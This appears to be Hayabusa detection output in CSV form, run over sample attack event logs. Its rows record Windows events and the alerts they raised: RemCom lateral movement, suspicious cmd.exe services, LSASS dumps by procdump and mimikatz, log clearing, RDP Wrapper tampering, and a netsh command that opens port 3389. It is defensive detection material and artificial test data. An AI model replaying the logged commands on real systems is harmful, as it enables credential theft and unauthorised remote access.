+2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:02.311 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49188 (PC01.example.corp) | Dst: 10.0.2.18:5357 (PC02) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:02.561 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 127.0.0.1:3702 (PC01.example.corp) | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:03.062 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49189 (PC01.example.corp) | Dst: 127.0.0.1:5357 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:03.062 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:5357 (PC01.example.corp) | Dst: 127.0.0.1:49189 (PC01.example.corp) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3820 | PGUID: 365ABB72-E0AE-5C67-0000-0010C9B81700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x311293,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x311293,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x7accb8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x7accb8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx
+2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service Installed,Svc: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
+2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service Possibly Installed,Svc: spoolfool | Path: cmd.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
+2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,Persis,Service Installed,Name: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
+2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service Installed,Svc: spoolsv | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
+2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service Possibly Installed,Svc: spoolsv | Path: cmd.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
+2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,Persis,Service Installed,Name: spoolsv | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx
+2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.exe_190317_120941.dmp | Process: C:\Users\IEUser\Desktop\procdump.exe | PID: 1856 | PGUID: 365ABB72-9B75-5C8E-0000-0010013F1200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File Creation,,../hayabusa-rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\procdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1856 | Src PGUID: 365ABB72-9B75-5C8E-0000-0010013F1200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\lsass (2).DMP | Process: C:\Windows\system32\taskmgr.exe | PID: 3576 | PGUID: 365ABB72-9B85-5C8E-0000-0010C4CC1200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File Creation,,../hayabusa-rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:10:03.991 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Windows\system32\taskmgr.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3576 | Src PGUID: 365ABB72-9B85-5C8E-0000-0010C4CC1200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx
+2019-03-18 04:26:42.116 +09:00,PC04.example.corp,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/net_share_drive_5142.evtx
+2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\mimikatz_trunk\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 3588 | Src PGUID: 365ABB72-A1E3-5C8E-0000-0010CEF72200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
+2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
+2019-03-18 04:37:11.661 +09:00,PC04.example.corp,10,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_lsass_mimikatz_sekurlsa_logonpasswords.evtx
+2019-03-18 05:17:44.537 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\install.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:17:44.637 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPCheck.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:17:44.797 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPConf.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:17:45.478 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\RDPWInst.exe | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:17:45.628 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\uninstall.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:17:45.648 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\RDPWRA~1.2\update.bat | Process: C:\Windows\Explorer.EXE | PID: 3884 | PGUID: 365ABB72-A965-5C8E-0000-0010D9100400,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:17:52.949 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | Process: C:\Windows\System32\cmd.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 3272 | PGUID: 365ABB72-AB70-5C8E-0000-0010781D0A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | Process: C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst.exe | User: PC04\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat"" | LID: 0x3c004 | PID: 3700 | PGUID: 365ABB72-AB70-5C8E-0000-0010DF1F0A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:17:52.979 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,medium,Persis | PrivEsc,ServiceDll Modification,,../hayabusa-rules/sigma/registry_event/win_re_set_servicedll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:05.086 +09:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,../hayabusa-rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,Evas,RDP Registry Modification,,../hayabusa-rules/sigma/registry_event/sysmon_rdp_registry_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.282 +09:00,PC04.example.corp,13,high,Evas,RDP Sensitive Settings Changed,,../hayabusa-rules/sigma/registry_event/sysmon_rdp_settings_hijack.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: netsh advfirewall firewall add rule name=""Remote Desktop"" dir=in protocol=tcp localport=3389 profile=any action=allow | Process: C:\Windows\System32\netsh.exe | User: PC04\IEUser | Parent Cmd: ""C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\RDPWInst"" -i -o | LID: 0x3c004 | PID: 3696 | PGUID: 365ABB72-AB81-5C8E-0000-001024960C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,medium,Evas,Netsh Port or Application Allowed,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_fw_add.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.312 +09:00,PC04.example.corp,1,high,Evas,Netsh RDP Port Opening,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_allow_port_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:09.643 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3c004 | PID: 3892 | PGUID: 365ABB72-AB81-5C8E-0000-00102E9E0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:18:12.096 +09:00,PC04.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 220 | Process: C:\Windows\System32\UI0Detect.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x3c004 | PID: 600 | PGUID: 365ABB72-AB84-5C8E-0000-00109EAD0C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe"" | Process: C:\Users\IEUser\Desktop\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch_20090425\UniversalTermsrvPatch-x86.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3c004 | PID: 4024 | PGUID: 365ABB72-ABFE-5C8E-0000-00105A560D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
+2019-03-18 05:20:14.512 +09:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_13_rdp_settings_tampering.evtx
